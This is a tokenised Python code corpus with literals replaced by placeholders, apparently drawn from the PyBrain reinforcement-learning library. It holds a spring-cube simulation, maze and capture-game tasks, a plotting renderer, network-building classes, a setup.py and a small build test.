edges = zeros ( ( <NUM_LIT:12> , <NUM_LIT:2> ) , int ) <EOL> count = <NUM_LIT:0> <EOL> c1 = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:2> ) : <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> c2 = <NUM_LIT:0> <EOL> for i2 in range ( <NUM_LIT:2> ) : <EOL> for j2 in range ( <NUM_LIT:2> ) : <EOL> for k2 in range ( <NUM_LIT:2> ) : <EOL> sum = abs ( i - i2 ) + abs ( j - j2 ) + abs ( k - k2 ) <EOL> if sum == <NUM_LIT:1> and i <= i2 and j <= j2 and k <= k2 : <EOL> self . edges [ count ] = [ c1 , c2 ] <EOL> count += <NUM_LIT:1> <EOL> c2 += <NUM_LIT:1> <EOL> c1 += <NUM_LIT:1> <EOL> def reset ( self ) : <EOL> self . action = ones ( ( <NUM_LIT:1> , <NUM_LIT:12> ) , float ) * self . dists [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:2> ) : <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> self . pos [ i * <NUM_LIT:4> + j * <NUM_LIT:2> + k ] = [ i * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> , j * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> + self . startHight , k * self . dists [ <NUM_LIT:0> ] - self . dists [ <NUM_LIT:0> ] / <NUM_LIT> ] <EOL> self . vel = zeros ( ( <NUM_LIT:8> , <NUM_LIT:3> ) , float ) <EOL> idx0 = arange ( <NUM_LIT:8> ) . repeat ( <NUM_LIT:8> ) <EOL> idx1 = array ( list ( range ( <NUM_LIT:8> ) ) * <NUM_LIT:8> ) <EOL> self . difM = self . pos [ idx0 , : ] - self . pos [ idx1 , : ] <EOL> self . springM = sqrt ( ( self . difM ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) ) . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> self . distM = self . springM . copy ( ) <EOL> self . step = <NUM_LIT:0> <EOL> self . mySensors . updateSensor ( self . pos , self . vel , self . distM , self . centerOfGrav , self . step , self . action ) <EOL> if self . render : <EOL> if self . server . clients > <NUM_LIT:0> : <EOL> self . server . send ( [ "<STR_LIT:r>" , "<STR_LIT:r>" ] ) <EOL> def performAction ( self , action ) : <EOL> action = self . 
normAct ( action ) <EOL> self . action = action . copy ( ) <EOL> self . act ( action ) <EOL> self . euler ( ) <EOL> self . step += <NUM_LIT:1> <EOL> if self . render : <EOL> if self . updateDone : <EOL> self . updateRenderer ( ) <EOL> if self . server . clients > <NUM_LIT:0> and self . realtime : <EOL> sleep ( <NUM_LIT> ) <EOL> def getSensors ( self ) : <EOL> self . mySensors . updateSensor ( self . pos , self . vel , self . distM , self . centerOfGrav , self . step , self . action ) <EOL> return self . mySensors . getSensor ( ) [ : ] <EOL> def normAct ( self , s ) : <EOL> return clip ( s , self . minAkt , self . maxAkt ) <EOL> def act ( self , a ) : <EOL> count = <NUM_LIT:0> <EOL> for i in self . edges : <EOL> self . springM [ i [ <NUM_LIT:0> ] * <NUM_LIT:8> + i [ <NUM_LIT:1> ] ] = a [ count ] <EOL> self . springM [ i [ <NUM_LIT:1> ] * <NUM_LIT:8> + i [ <NUM_LIT:0> ] ] = a [ count ] <EOL> count += <NUM_LIT:1> <EOL> def euler ( self ) : <EOL> self . count += <NUM_LIT:1> <EOL> distM = self . distM . copy ( ) <EOL> disM = self . springM - distM <EOL> disM = disM . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> distM = distM + <NUM_LIT> <EOL> vel = self . difM / distM <EOL> vel *= disM * self . d * self . dt <EOL> idx2 = arange ( <NUM_LIT:8> ) <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> self . vel [ i ] += vel [ idx2 + i * <NUM_LIT:8> , : ] . sum ( axis = <NUM_LIT:0> ) <EOL> self . vel += self . gravVect * self . dt <EOL> self . vel -= self . vel * self . dumping * self . dt <EOL> self . pos += self . dt * self . vel <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> if self . pos [ i ] [ <NUM_LIT:1> ] < <NUM_LIT:0.0> : <EOL> self . pos [ i ] [ <NUM_LIT:1> ] = <NUM_LIT:0.0> <EOL> self . vel [ i ] = self . vel [ i ] * [ <NUM_LIT:0.0> , - <NUM_LIT:1.0> , <NUM_LIT:0.0> ] <EOL> self . centerOfGrav = self . pos . sum ( axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> idx0 = arange ( <NUM_LIT:8> ) . 
repeat ( <NUM_LIT:8> ) <EOL> idx1 = array ( list ( range ( <NUM_LIT:8> ) ) * <NUM_LIT:8> ) <EOL> self . difM = self . pos [ idx0 , : ] - self . pos [ idx1 , : ] <EOL> self . distM = sqrt ( ( self . difM ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) ) . reshape ( <NUM_LIT:64> , <NUM_LIT:1> ) <EOL> @ threaded ( ) <EOL> def updateRenderer ( self ) : <EOL> self . updateDone = False <EOL> if not self . updateLock . acquire ( False ) : return <EOL> self . server . listen ( ) <EOL> if self . server . clients > <NUM_LIT:0> : <EOL> self . server . send ( repr ( [ self . pos , self . centerOfGrav ] ) ) <EOL> sleep ( <NUM_LIT> ) <EOL> self . updateLock . release ( ) <EOL> self . updateDone = True </s>
<s> __author__ = '<STR_LIT>' <EOL> from scipy import array , zeros <EOL> from random import choice <EOL> from . maze import MazeTask <EOL> class TMaze ( MazeTask ) : <EOL> """<STR_LIT>""" <EOL> discount = <NUM_LIT> <EOL> observations = <NUM_LIT:4> <EOL> finalReward = <NUM_LIT:4> <EOL> bangPenalty = - <NUM_LIT:0.1> <EOL> length = <NUM_LIT:10> <EOL> def __init__ ( self , ** args ) : <EOL> self . initPos = [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> self . setArgs ( ** args ) <EOL> columns = [ [ <NUM_LIT:1> ] * <NUM_LIT:5> ] <EOL> for dummy in range ( self . length ) : <EOL> columns . append ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> columns . append ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> columns . append ( [ <NUM_LIT:1> ] * <NUM_LIT:5> ) <EOL> self . topology = array ( columns ) . T <EOL> MazeTask . __init__ ( self , ** args ) <EOL> def reset ( self ) : <EOL> MazeTask . reset ( self ) <EOL> goUp = choice ( [ True , False ] ) <EOL> self . specialObs = goUp <EOL> if goUp : <EOL> self . env . goal = ( <NUM_LIT:3> , self . length + <NUM_LIT:1> ) <EOL> else : <EOL> self . env . goal = ( <NUM_LIT:1> , self . length + <NUM_LIT:1> ) <EOL> def getObservation ( self ) : <EOL> res = zeros ( <NUM_LIT:4> ) <EOL> if self . env . perseus == self . env . initPos [ <NUM_LIT:0> ] : <EOL> if self . specialObs : <EOL> res [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> else : <EOL> res [ <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> elif self . env . perseus [ <NUM_LIT:1> ] == self . length + <NUM_LIT:1> : <EOL> res [ <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> else : <EOL> res [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> return res <EOL> def getReward ( self ) : <EOL> if self . env . perseus [ <NUM_LIT:1> ] == self . length + <NUM_LIT:1> : <EOL> if abs ( self . env . perseus [ <NUM_LIT:0> ] - self . env . goal [ <NUM_LIT:0> ] ) == <NUM_LIT:2> : <EOL> self . env . perseus = self . env . goal <EOL> return self . bangPenalty <EOL> return MazeTask . 
getReward ( self ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pylab import plot , figure , ion , Line2D , draw , arange <EOL> from pybrain . rl . environments . renderer import Renderer <EOL> import threading <EOL> import time <EOL> class SimpleRenderer ( Renderer ) : <EOL> def __init__ ( self ) : <EOL> Renderer . __init__ ( self ) <EOL> self . dataLock = threading . Lock ( ) <EOL> self . stopRequest = False <EOL> self . pathx = [ ] <EOL> self . pathy = [ ] <EOL> self . f = None <EOL> self . min = - <NUM_LIT:1> <EOL> self . max = <NUM_LIT:1> <EOL> self . fig = None <EOL> self . color = '<STR_LIT>' <EOL> def setFunction ( self , f , rmin , rmax ) : <EOL> self . dataLock . acquire ( ) <EOL> self . f = f <EOL> self . min = rmin <EOL> self . max = rmax <EOL> self . dataLock . release ( ) <EOL> def updateData ( self , data ) : <EOL> self . dataLock . acquire ( ) <EOL> ( x , y ) = data <EOL> self . pathx . append ( x ) <EOL> self . pathy . append ( y ) <EOL> self . dataLock . release ( ) <EOL> def reset ( self ) : <EOL> self . dataLock . acquire ( ) <EOL> self . pathx = [ ] <EOL> self . pathy = [ ] <EOL> self . dataLock . release ( ) <EOL> def stop ( self ) : <EOL> self . dataLock . acquire ( ) <EOL> self . stopRequest = True <EOL> self . dataLock . release ( ) <EOL> def start ( self ) : <EOL> self . drawPlot ( ) <EOL> Renderer . start ( self ) <EOL> def drawPlot ( self ) : <EOL> ion ( ) <EOL> self . fig = figure ( ) <EOL> axes = self . fig . add_subplot ( <NUM_LIT> ) <EOL> xvalues = arange ( self . min , self . max , <NUM_LIT:0.1> ) <EOL> yvalues = list ( map ( self . f , xvalues ) ) <EOL> plot ( xvalues , yvalues ) <EOL> self . line = Line2D ( [ ] , [ ] , linewidth = <NUM_LIT:3> , color = '<STR_LIT>' ) <EOL> axes . add_artist ( self . line ) <EOL> self . line . set_clip_box ( axes . bbox ) <EOL> axes . set_xlim ( min ( xvalues ) - <NUM_LIT:0.5> , max ( xvalues ) + <NUM_LIT:0.5> ) <EOL> axes . 
set_ylim ( min ( yvalues ) - <NUM_LIT:0.5> , max ( yvalues ) + <NUM_LIT:0.5> ) <EOL> def _render ( self ) : <EOL> while not self . stopRequest : <EOL> self . dataLock . acquire ( ) <EOL> self . line . set_data ( self . pathx , self . pathy ) <EOL> self . line . set_color ( self . color ) <EOL> figure ( self . fig . number ) <EOL> draw ( ) <EOL> self . dataLock . release ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . stopRequest = False </s>
<s> from __future__ import print_function <EOL> __author__ = '<STR_LIT>' <EOL> from . capturetask import CaptureGameTask <EOL> from pybrain . rl . environments . twoplayergames . capturegameplayers import ModuleDecidingPlayer <EOL> from pybrain . rl . environments . twoplayergames import CaptureGame <EOL> from pybrain . rl . environments . twoplayergames . capturegameplayers . captureplayer import CapturePlayer <EOL> from pybrain . structure . networks . custom . capturegame import CaptureGameNetwork <EOL> class RelativeCaptureTask ( CaptureGameTask ) : <EOL> """<STR_LIT>""" <EOL> useNetworks = False <EOL> maxGames = <NUM_LIT:3> <EOL> presetGamesProportion = <NUM_LIT:0.5> <EOL> minTemperature = <NUM_LIT:0> <EOL> maxTemperature = <NUM_LIT> <EOL> verbose = False <EOL> numMovesCoeff = <NUM_LIT:0.5> <EOL> def __init__ ( self , size , ** args ) : <EOL> self . setArgs ( ** args ) <EOL> self . size = size <EOL> self . task = CaptureGameTask ( self . size ) <EOL> self . env = self . task . env <EOL> if self . presetGamesProportion > <NUM_LIT:0> : <EOL> self . sPos = self . _fixedStartingPos ( ) <EOL> self . cases = int ( len ( self . sPos ) / self . presetGamesProportion ) <EOL> else : <EOL> self . cases = <NUM_LIT:1> <EOL> self . maxmoves = self . size * self . size <EOL> self . minmoves = <NUM_LIT:3> <EOL> def __call__ ( self , p1 , p2 ) : <EOL> self . temp = self . minTemperature <EOL> if self . useNetworks : <EOL> p1 = ModuleDecidingPlayer ( p1 , self . task . env , temperature = self . temp ) <EOL> p2 = ModuleDecidingPlayer ( p2 , self . task . env , temperature = self . temp ) <EOL> else : <EOL> assert isinstance ( p1 , CapturePlayer ) <EOL> assert isinstance ( p2 , CapturePlayer ) <EOL> p1 . game = self . task . env <EOL> p2 . game = self . task . env <EOL> p1 . color = CaptureGame . BLACK <EOL> p2 . color = - p1 . color <EOL> self . player = p1 <EOL> self . opponent = p2 <EOL> coeffSum = <NUM_LIT:0.> <EOL> score = <NUM_LIT:0.> <EOL> np = int ( self . 
cases * ( <NUM_LIT:1> - self . presetGamesProportion ) ) <EOL> for i in range ( self . maxGames ) : <EOL> coeff = <NUM_LIT:1> / ( <NUM_LIT:10> * self . temp + <NUM_LIT:1> ) <EOL> preset = None <EOL> if self . cases > <NUM_LIT:1> : <EOL> if i % self . cases >= np : <EOL> preset = self . sPos [ ( i - np ) % self . cases ] <EOL> elif i < self . cases : <EOL> if i == <NUM_LIT:0> : <EOL> coeff *= np <EOL> else : <EOL> continue <EOL> res = self . _oneGame ( preset ) <EOL> score += coeff * res <EOL> coeffSum += coeff <EOL> if self . cases == <NUM_LIT:1> or ( i % self . cases == <NUM_LIT:0> and i > <NUM_LIT:0> ) : <EOL> self . _globalWarming ( ) <EOL> return score / coeffSum <EOL> def _globalWarming ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . temp == <NUM_LIT:0> : <EOL> self . temp = <NUM_LIT> <EOL> else : <EOL> self . temp *= <NUM_LIT> <EOL> if self . temp > self . maxTemperature : <EOL> return False <EOL> elif self . _setTemperature ( ) == False : <EOL> self . temp = self . minTemperature <EOL> return False <EOL> return True <EOL> def _setTemperature ( self ) : <EOL> if self . useNetworks : <EOL> self . opponent . temperature = self . temp <EOL> self . player . temperature = self . temp <EOL> return True <EOL> elif hasattr ( self . opponent , '<STR_LIT>' ) : <EOL> randPart = self . temp / ( self . temp + <NUM_LIT:1> ) <EOL> self . opponent . randomPartMoves = randPart <EOL> self . player . randomPartMoves = randPart <EOL> return True <EOL> else : <EOL> return False <EOL> def _fixedStartingPos ( self ) : <EOL> """<STR_LIT>""" <EOL> res = [ ] <EOL> if self . size < <NUM_LIT:3> : <EOL> return res <EOL> for x in range ( <NUM_LIT:1> , ( self . size + <NUM_LIT:1> ) // <NUM_LIT:2> ) : <EOL> for y in range ( x , ( self . size + <NUM_LIT:1> ) // <NUM_LIT:2> ) : <EOL> res . append ( ( x , y ) ) <EOL> return res <EOL> def _oneGame ( self , preset = None ) : <EOL> """<STR_LIT>""" <EOL> self . env . reset ( ) <EOL> if preset != None : <EOL> self . env . _setStone ( CaptureGame . 
BLACK , preset ) <EOL> self . env . movesDone += <NUM_LIT:1> <EOL> self . env . playToTheEnd ( self . opponent , self . player ) <EOL> else : <EOL> self . env . playToTheEnd ( self . player , self . opponent ) <EOL> moves = self . env . movesDone <EOL> win = self . env . winner == self . player . color <EOL> if self . verbose : <EOL> print ( ( '<STR_LIT>' , preset , '<STR_LIT>' , self . temp , '<STR_LIT>' , win , '<STR_LIT>' , moves , '<STR_LIT>' ) ) <EOL> res = <NUM_LIT:1> - self . numMovesCoeff * ( moves - self . minmoves ) / ( self . maxmoves - self . minmoves ) <EOL> if win : <EOL> return res <EOL> else : <EOL> return - res <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> assert RelativeCaptureTask ( <NUM_LIT:5> ) . _fixedStartingPos ( ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ] <EOL> assert RelativeCaptureTask ( <NUM_LIT:8> ) . _fixedStartingPos ( ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ] <EOL> net1 = CaptureGameNetwork ( hsize = <NUM_LIT:1> ) <EOL> net2 = CaptureGameNetwork ( hsize = <NUM_LIT:1> ) <EOL> r = RelativeCaptureTask ( <NUM_LIT:5> , maxGames = <NUM_LIT> , useNetworks = True , <EOL> presetGamesProportion = <NUM_LIT:0.5> ) <EOL> print ( ( r ( net1 , net2 ) ) ) <EOL> print ( ( r ( net2 , net1 ) ) ) <EOL> r . maxGames = <NUM_LIT:200> <EOL> print ( ( r ( net1 , net2 ) ) ) <EOL> print ( ( r ( net2 , net1 ) ) ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pybrain . rl . learners . learner import Learner <EOL> class MetaLearner ( Learner ) : <EOL> """<STR_LIT>""" </s>
<s> __author__ = '<STR_LIT>' <EOL> from pybrain . utilities import iterCombinations , Named <EOL> from pybrain . structure . moduleslice import ModuleSlice <EOL> from functools import reduce <EOL> class ModuleMesh ( Named ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , constructor , dimensions , name = None , baserename = False ) : <EOL> """<STR_LIT>""" <EOL> self . dims = dimensions <EOL> if name != None : <EOL> self . name = name <EOL> self . components = { } <EOL> for coord in iterCombinations ( self . dims ) : <EOL> tmp = constructor ( ) <EOL> self . components [ coord ] = tmp <EOL> tmp . name = self . name + str ( coord ) <EOL> if baserename and isinstance ( tmp , ModuleSlice ) : <EOL> tmp . base . name = tmp . name <EOL> self . componentIndim = tmp . indim <EOL> self . componentOutdim = tmp . outdim <EOL> @ staticmethod <EOL> def constructWithLayers ( layerclass , layersize , dimensions , name = None ) : <EOL> """<STR_LIT>""" <EOL> c = lambda : layerclass ( layersize ) <EOL> return ModuleMesh ( c , dimensions , name ) <EOL> @ staticmethod <EOL> def viewOnFlatLayer ( layer , dimensions , name = None ) : <EOL> """<STR_LIT>""" <EOL> assert max ( dimensions ) > <NUM_LIT:1> , "<STR_LIT>" <EOL> def slicer ( ) : <EOL> nbunits = reduce ( lambda x , y : x * y , dimensions , <NUM_LIT:1> ) <EOL> insize = layer . indim // nbunits <EOL> outsize = layer . outdim // nbunits <EOL> for index in range ( nbunits ) : <EOL> yield ModuleSlice ( layer , insize * index , insize * ( index + <NUM_LIT:1> ) , outsize * index , outsize * ( index + <NUM_LIT:1> ) ) <EOL> c = slicer ( ) <EOL> return ModuleMesh ( lambda : next ( c ) , dimensions , name ) <EOL> def __iter__ ( self ) : <EOL> for coord in iterCombinations ( self . dims ) : <EOL> yield self . components [ coord ] <EOL> def __getitem__ ( self , coord ) : <EOL> return self . components [ coord ] </s>
<s> __author__ = '<STR_LIT>' <EOL> import random <EOL> from pybrain import SharedFullConnection , MotherConnection , MDLSTMLayer , IdentityConnection <EOL> from pybrain import ModuleMesh , LinearLayer , TanhLayer , SigmoidLayer <EOL> from pybrain . structure . networks import BorderSwipingNetwork <EOL> class CaptureGameNetwork ( BorderSwipingNetwork ) : <EOL> """<STR_LIT>""" <EOL> size = <NUM_LIT:5> <EOL> insize = <NUM_LIT:2> <EOL> hsize = <NUM_LIT:5> <EOL> predefined = None <EOL> directlink = False <EOL> componentclass = TanhLayer <EOL> outcomponentclass = SigmoidLayer <EOL> peepholes = False <EOL> outputs = <NUM_LIT:1> <EOL> comboutputs = <NUM_LIT:0> <EOL> combinputs = <NUM_LIT:0> <EOL> rebuilt = False <EOL> def __init__ ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:size>' in args : <EOL> self . size = args [ '<STR_LIT:size>' ] <EOL> args [ '<STR_LIT>' ] = ( self . size , self . size ) <EOL> assert self . size > <NUM_LIT:1> , '<STR_LIT>' <EOL> BorderSwipingNetwork . __init__ ( self , ** args ) <EOL> if not self . rebuilt : <EOL> self . _buildCaptureNetwork ( ) <EOL> self . sortModules ( ) <EOL> self . rebuilt = True <EOL> self . setArgs ( rebuilt = True ) <EOL> def _buildCaptureNetwork ( self ) : <EOL> inmod = LinearLayer ( self . insize * self . size * self . size , name = '<STR_LIT:input>' ) <EOL> inmesh = ModuleMesh . viewOnFlatLayer ( inmod , ( self . size , self . size ) , '<STR_LIT>' ) <EOL> outmod = self . outcomponentclass ( self . outputs * self . size * self . size , name = '<STR_LIT>' ) <EOL> outmesh = ModuleMesh . viewOnFlatLayer ( outmod , ( self . size , self . size ) , '<STR_LIT>' ) <EOL> if self . componentclass is MDLSTMLayer : <EOL> c = lambda : MDLSTMLayer ( self . hsize , <NUM_LIT:2> , self . peepholes ) . meatSlice ( ) <EOL> hiddenmesh = ModuleMesh ( c , ( self . size , self . size , <NUM_LIT:4> ) , '<STR_LIT>' , baserename = True ) <EOL> else : <EOL> hiddenmesh = ModuleMesh . constructWithLayers ( self . 
componentclass , self . hsize , ( self . size , self . size , <NUM_LIT:4> ) , '<STR_LIT>' ) <EOL> self . _buildBorderStructure ( inmesh , hiddenmesh , outmesh ) <EOL> for m in self . modules : <EOL> if isinstance ( m , MDLSTMLayer ) : <EOL> tmp = m . stateSlice ( ) <EOL> index = <NUM_LIT:0> <EOL> for c in list ( self . connections [ m ] ) : <EOL> if isinstance ( c . outmod , MDLSTMLayer ) : <EOL> self . addConnection ( IdentityConnection ( tmp , c . outmod . stateSlice ( ) , <EOL> outSliceFrom = self . hsize * ( index ) , <EOL> outSliceTo = self . hsize * ( index + <NUM_LIT:1> ) ) ) <EOL> index += <NUM_LIT:1> <EOL> if self . directlink : <EOL> self . _buildDirectLink ( inmesh , outmesh ) <EOL> if self . combinputs > <NUM_LIT:0> : <EOL> cin = LinearLayer ( self . combinputs , name = '<STR_LIT>' ) <EOL> self . addInputModule ( cin ) <EOL> if '<STR_LIT>' not in self . predefined : <EOL> self . predefined [ '<STR_LIT>' ] = MotherConnection ( cin . componentOutdim * hiddenmesh . componentIndim , '<STR_LIT>' ) <EOL> self . _linkToAll ( cin , hiddenmesh , self . predefined [ '<STR_LIT>' ] ) <EOL> def _buildDirectLink ( self , inmesh , outmesh ) : <EOL> if not '<STR_LIT>' in self . predefined : <EOL> self . predefined [ '<STR_LIT>' ] = MotherConnection ( inmesh . componentOutdim * outmesh . componentIndim , '<STR_LIT>' ) <EOL> for unit in self . _iterateOverUnits ( ) : <EOL> self . addConnection ( SharedFullConnection ( self . predefined [ '<STR_LIT>' ] , inmesh [ unit ] , outmesh [ unit ] ) ) <EOL> def _linkToAll ( self , inmod , mesh , conn ) : <EOL> for unit in self . _iterateOverUnits ( ) : <EOL> self . addConnection ( SharedFullConnection ( conn , inmod , mesh [ unit ] ) ) <EOL> def _generateName ( self ) : <EOL> """<STR_LIT>""" <EOL> name = self . __class__ . __name__ <EOL> name += '<STR_LIT>' + str ( self . size ) <EOL> name += '<STR_LIT>' + str ( self . hsize ) <EOL> if self . directlink : <EOL> name += '<STR_LIT>' <EOL> if self . 
componentclass != TanhLayer : <EOL> name += '<STR_LIT:->' + self . componentclass . __name__ <EOL> if self . outputs > <NUM_LIT:1> : <EOL> name += '<STR_LIT>' + str ( self . outputs ) <EOL> if self . combinputs > <NUM_LIT:0> : <EOL> name += '<STR_LIT>' + str ( self . combinputs ) <EOL> name += '<STR_LIT>' + str ( int ( random . random ( ) * <NUM_LIT> + <NUM_LIT> ) ) <EOL> return name <EOL> def resizedTo ( self , newsize ) : <EOL> """<STR_LIT>""" <EOL> if newsize == self . size : <EOL> return self . copy ( ) <EOL> else : <EOL> import copy <EOL> for mc in self . motherconnections : <EOL> mc . owner = None <EOL> cdict = copy . deepcopy ( self . predefined ) <EOL> args = self . argdict . copy ( ) <EOL> args [ '<STR_LIT:size>' ] = newsize <EOL> del args [ '<STR_LIT>' ] <EOL> for mc in self . motherconnections : <EOL> mc . owner = self <EOL> return CaptureGameNetwork ( predefined = cdict , ** args ) </s>
<s> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> from pybrain . utilities import Named , abstractMethod <EOL> class Trainer ( Named ) : <EOL> """<STR_LIT>""" <EOL> ds = None <EOL> module = None <EOL> def __init__ ( self , module ) : <EOL> self . module = module <EOL> def setData ( self , dataset ) : <EOL> """<STR_LIT>""" <EOL> self . ds = dataset <EOL> if dataset : <EOL> assert dataset . indim == self . module . indim <EOL> assert dataset . outdim == self . module . outdim <EOL> def trainOnDataset ( self , dataset , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . setData ( dataset ) <EOL> self . trainEpochs ( * args , ** kwargs ) <EOL> def trainEpochs ( self , epochs = <NUM_LIT:1> , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for dummy in range ( epochs ) : <EOL> self . train ( * args , ** kwargs ) <EOL> def train ( self ) : <EOL> """<STR_LIT>""" <EOL> abstractMethod ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from pybrain . structure import RecurrentNetwork <EOL> from pybrain import LinearLayer , FullConnection <EOL> from pybrain . tools . shortcuts import buildNetwork <EOL> from pybrain . tests import runModuleTestSuite <EOL> def buildMixedNestedNetwork ( ) : <EOL> """<STR_LIT>""" <EOL> N = RecurrentNetwork ( '<STR_LIT>' ) <EOL> a = LinearLayer ( <NUM_LIT:1> , name = '<STR_LIT:a>' ) <EOL> b = LinearLayer ( <NUM_LIT:2> , name = '<STR_LIT:b>' ) <EOL> c = buildNetwork ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> c . name = '<STR_LIT>' <EOL> N . addInputModule ( a ) <EOL> N . addModule ( c ) <EOL> N . addOutputModule ( b ) <EOL> N . addConnection ( FullConnection ( a , b ) ) <EOL> N . addConnection ( FullConnection ( b , c ) ) <EOL> N . addRecurrentConnection ( FullConnection ( c , c ) ) <EOL> N . sortModules ( ) <EOL> return N <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> runModuleTestSuite ( __import__ ( '<STR_LIT:__main__>' ) ) </s>
<s> from __future__ import print_function <EOL> from pickle import load , dump <EOL> from scipy import array , sqrt <EOL> from pylab import errorbar , show <EOL> class ExTools ( ) : <EOL> agent = None <EOL> loadName = "<STR_LIT>" <EOL> saveName = "<STR_LIT>" <EOL> resuName = "<STR_LIT>" <EOL> rl = [ ] <EOL> rll = [ ] <EOL> def __init__ ( self , batch = <NUM_LIT:2> , prnts = <NUM_LIT:1> , kind = "<STR_LIT>" ) : <EOL> self . batch = batch <EOL> self . prnts = prnts <EOL> self . kind = kind <EOL> def loadWeights ( self , filename ) : <EOL> filepointer = open ( filename ) <EOL> self . agent . learner . current = load ( filepointer ) <EOL> filepointer . close ( ) <EOL> self . agent . learner . gd . init ( self . agent . learner . current ) <EOL> self . agent . learner . epsilon = <NUM_LIT> <EOL> self . agent . learner . initSigmas ( ) <EOL> def saveWeights ( self , filename , w ) : <EOL> filepointer = open ( filename , '<STR_LIT>' ) <EOL> dump ( w , filepointer ) <EOL> filepointer . close ( ) <EOL> def saveResults ( self , filename , results ) : <EOL> filepointer = open ( filename , '<STR_LIT>' ) <EOL> dump ( results , filepointer ) <EOL> filepointer . close ( ) <EOL> def printResults ( self , resList , runs , updates ) : <EOL> if self . kind == "<STR_LIT>" : <EOL> rLen = len ( resList ) <EOL> avReward = array ( resList ) . sum ( ) / rLen <EOL> print ( ( "<STR_LIT>" , self . agent . learner . _bestFound ( ) ) ) <EOL> print ( ( "<STR_LIT>" , runs , <EOL> "<STR_LIT>" , ( updates + <NUM_LIT:1> ) * self . batch * self . prnts , <EOL> "<STR_LIT>" , self . agent . learner . bestEvaluation , <EOL> "<STR_LIT>" , avReward ) ) <EOL> print ( ) <EOL> self . rl . append ( avReward ) <EOL> else : <EOL> avReward = resList <EOL> print ( ( <EOL> "<STR_LIT>" , runs , "<STR_LIT:/>" , ( updates + <NUM_LIT:1> ) * self . batch * self . prnts , <EOL> "<STR_LIT>" , avReward ) ) <EOL> self . rl . append ( avReward ) <EOL> def addExps ( self ) : <EOL> self . rll . append ( self . 
rl ) <EOL> self . rl = [ ] <EOL> def showExps ( self ) : <EOL> nEx = len ( self . rll ) <EOL> self . rll = array ( self . rll ) <EOL> r = self . rll . sum ( axis = <NUM_LIT:0> ) / nEx <EOL> d = self . rll - r <EOL> v = ( d ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> ) <EOL> v = v / nEx <EOL> stand = sqrt ( v ) <EOL> errorbar ( array ( list ( range ( len ( self . rll [ <NUM_LIT:0> ] ) ) ) ) * self . prnts * self . batch + self . prnts * self . batch , r , stand ) <EOL> show ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> test_suite = '<STR_LIT>' , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> ) </s>
<s> import unittest <EOL> from integrationtest_support import IntegrationTestSupport <EOL> from pybuilder . errors import ProjectValidationFailedException <EOL> class Test ( IntegrationTestSupport ) : <EOL> def test ( self ) : <EOL> self . write_build_file ( """<STR_LIT>""" ) <EOL> reactor = self . prepare_reactor ( ) <EOL> self . assertRaises ( <EOL> ProjectValidationFailedException , reactor . build , [ "<STR_LIT>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
